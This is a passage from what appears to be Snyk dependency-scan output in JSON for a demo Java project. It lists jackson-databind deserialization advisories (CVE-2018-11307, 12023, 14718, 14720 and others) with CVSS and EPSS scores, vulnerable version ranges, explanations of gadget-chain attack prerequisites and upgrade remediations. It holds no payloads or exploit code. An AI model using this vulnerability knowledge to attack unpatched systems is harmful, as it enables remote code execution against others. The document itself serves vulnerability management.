streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", - "epssDetails": { - "percentile": "0.81303", - "probability": "0.00770", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-12022" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cjjf-94ff-43w7", - "GHSA-wrr7-33fx-rcvj" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:11:34.234921Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-29T17:00:04Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:00:03Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:36.643590Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0, 2.8.11.2)", - "[2.9.0, 2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2032", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 5.6, - "modificationTime": "2024-03-11T09:47:14.962980Z" - }, - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:26.624837Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:53.818908Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:14.962980Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:26.624837Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", - "epssDetails": { - "percentile": "0.85803", - "probability": "0.01278", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-11307" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-qr7j-h6gg-jmgc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:14:00.916831Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0, 2.8.11.2)", - "[2.9.0, 2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-10T17:10:58Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:10:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:26.624837Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2058", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:31.058577Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 5.6, - "modificationTime": "2024-03-11T09:48:43.326081Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.092429Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:31.058577Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:43.326081Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", - "epssDetails": { - "percentile": "0.82708", - "probability": "0.00890", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-12023" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6wqp-v4v6-c87c" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:16:09.944095Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-29T17:15:50Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:15:49Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:43.326081Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:45.223431Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:22.234808Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.637612Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:45.223431Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:22.234808Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.92634", - "probability": "0.04626", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14718" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-645p-88qh-w398" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:21:07.540945Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:19:49Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:19:41Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:22.234808Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.008907Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:33.930153Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.195569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:48.008907Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:33.930153Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which 